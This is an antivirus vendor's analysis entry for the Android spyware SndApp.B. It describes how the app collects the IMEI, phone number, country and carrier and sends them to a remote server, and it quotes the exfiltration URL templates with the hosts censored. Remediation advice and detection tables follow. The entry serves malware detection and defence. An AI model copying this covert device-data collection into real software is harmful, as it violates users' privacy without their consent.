Android/SndApp.B!tr
Analysis
Android/SndApp.B!tr is a variant of Android/SndApp.A!tr.spy.
The malware runs on Android phones, version 2.1 and above.
This variant does not send memorized accounts or emails. It only sends to
a remote web site the following information:
- IMEI
- phone number
- country
- operator
Technical Details
The malware consists in three main components:
- the main entry point, AirHorn, which is called when the victim launches the application.
- a background service, com.and.snd.AndroidSoundService
- and installation refererrer receiver
http://[CENSORED]66.com/lead/e2c4x2a494x2/&pid=2738&aid=XXX&cookieid=YYThe remote end replies with an affiliate ID, subid, ext and cookie.
Then, when the victim launches the malware, the AirHorn class is created and verifies that the background AndroidSoundService is running (if not, runs it).
The malware retrieves the phone's IMEI, line number, network country iso string and operator name. Then, it visits the following URL:
http://[CENSORED]ios.com/android_notifier/notifier.php? app=airhorn&deviceId=IMEI&mobile=PHONENUMBER&country=COUNTRY&carrier=CARRIERThe IMEI and phone number (at least) are considered private information and should not be sent over without user's consent, in clear text moreover.
Every hour, the malware potentially displays a notification with a title, text and link (all this information is sent by the remote end).
Recommended Action
- FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2019-04-12 | 67.75300 |